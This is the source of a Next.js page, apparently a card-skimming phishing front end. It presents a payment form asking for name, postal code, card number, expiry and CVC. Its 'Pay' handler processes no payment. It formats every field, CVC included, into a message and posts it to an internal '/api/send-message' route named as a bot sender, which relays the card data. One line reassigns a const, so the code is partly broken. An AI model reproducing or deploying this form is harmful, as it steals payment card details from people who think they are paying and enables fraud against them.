import Head from 'next/head'
import Image from 'next/image'
import styles from '../styles/Home.module.css'
import { PaymentInputsWrapper, usePaymentInputs } from 'react-payment-inputs';
import images from 'react-payment-inputs/images';
import { useState } from 'react';
const axios = require('axios')

export default function Home() {
  const [cardNumber, setCardNumber] = useState("")
  const [expiry, setExpiry] = useState("")
  const [cvc, setCvc] = useState("")
  const [fullName, setFullName] = useState("")
  const [zip, setZip] = useState("")

  const {
    wrapperProps,
    getCardImageProps,
    getCardNumberProps,
    getExpiryDateProps,
    getCVCProps
  } = usePaymentInputs();

  var sendMessageWithBot = async (msg) => {
    axios.post('/api/send-message', {
      msg: msg
    })
  }
  var pay = () => {
    expiry = expiry.replace(' ', '')
    expiry = expiry.replace(' ', '')
    sendMessageWithBot(`_______________________________________\n\n\n_______________________________________\n\n\n          ${fullName.toUpperCase()}\n\n          ${cardNumber} \n\n                        ${expiry}\n\n\n_______________________________________\n\n\n${cvc} | ${zip}\n\n\n_______________________________________`)
  }

  return (
    <div className={styles.container}>
      <Head>
        <title>Create Next App</title>
        <meta name="description" content="Generated by create next app" />
        <link rel="icon" href="/favicon.ico" />
      </Head>

      <main className={styles.main}>
        <div className="App">
          <header className="App-header">
            <h1 className="App-title">Test</h1>
          </header>
          <input type="text" placeholder='Name on card' onChange={(e)=>setFullName(e.target.value)} /> <br/><br/>
          <input type="text" placeholder='Postal code' onChange={(e)=>setZip(e.target.value)} /> <br/><br/>
            <PaymentInputsWrapper {...wrapperProps}>
              <svg {...getCardImageProps({ images })} />
              <input {...getCardNumberProps()} onChange={(e)=>setCardNumber(e.target.value)}/>
              <input {...getExpiryDateProps()} onChange={(e)=>setExpiry(e.target.value)}/>
              <input {...getCVCProps()} onChange={(e)=>setCvc(e.target.value)}/>
            </PaymentInputsWrapper>
          <br/><br/>
          <button onClick={()=>pay()}>Pay</button>
        </div>
      </main>

      <footer className={styles.footer}>
        <a
          href="https://vercel.com?utm_source=create-next-app&utm_medium=default-template&utm_campaign=create-next-app"
          target="_blank"
          rel="noopener noreferrer"
        >
          Powered by{' '}
          <span className={styles.logo}>
            <Image src="/vercel.svg" alt="Vercel Logo" width={72} height={16} />
          </span>
        </a>
      </footer>
    </div>
  )
}
